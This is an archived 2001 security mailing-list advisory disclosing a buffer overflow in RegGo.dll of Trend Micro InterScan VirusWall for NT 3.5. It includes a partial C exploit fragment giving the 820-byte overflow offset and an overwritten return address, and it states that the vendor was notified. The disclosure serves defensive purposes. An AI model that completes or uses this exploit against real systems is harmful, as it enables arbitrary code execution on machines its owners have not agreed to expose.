TrendMicro Interscan VirusWall RegGo.dll BOf

From: Nobuo Miwa (n-miwaat_private)
Date: Fri May 18 2001 - 10:15:54 PDT

Next message: Tamer Sahin: "Tamersahin.net Security Announcement: Debian 2.2 is 2.2r3 Ftpd Daemon Buffer Owerflow Vulnerability"

Previous message: Alliance Security Labs: "ASLabs-2001-01: Multiple Security Problems in eEye SecureIIS"
Reply: Nobuo Miwa: "Re: TrendMicro Interscan VirusWall RegGo.dll BOf"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi,

This is a Buffer Overflow vulneravility in Trend Micro
InterScan VirusWall for NT 3.5.
RegGo.dll is the one.

Following code is a peace of exploit program.

    for ( j=0 ; j<820 ; j++ )
        sploit[j]='a' ;
    sploit[j++]=0xD5 ;
    sploit[j++]=0x63 ;
    sploit[j++]=0xF6 ;
    sploit[j++]=0x77 ;
    sploit[j++]=0xCC ; --> any code will be executed

I've already reported Trend Micro support team and they
will fix this issue in InterScan version 3.51 Build 1349.


<Nobuo Miwa> n-miwaat_private       ( @ @ ) http://www.lac.co.jp/security/
-------------------------------o00o--(. .)--o00o--------------------------
The moderator of BUGTRAQ-JP

Next message: Tamer Sahin: "Tamersahin.net Security Announcement: Debian 2.2 is 2.2r3 Ftpd Daemon Buffer Owerflow Vulnerability"
Previous message: Alliance Security Labs: "ASLabs-2001-01: Multiple Security Problems in eEye SecureIIS"
Reply: Nobuo Miwa: "Re: TrendMicro Interscan VirusWall RegGo.dll BOf"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri May 18 2001 - 11:15:36 PDT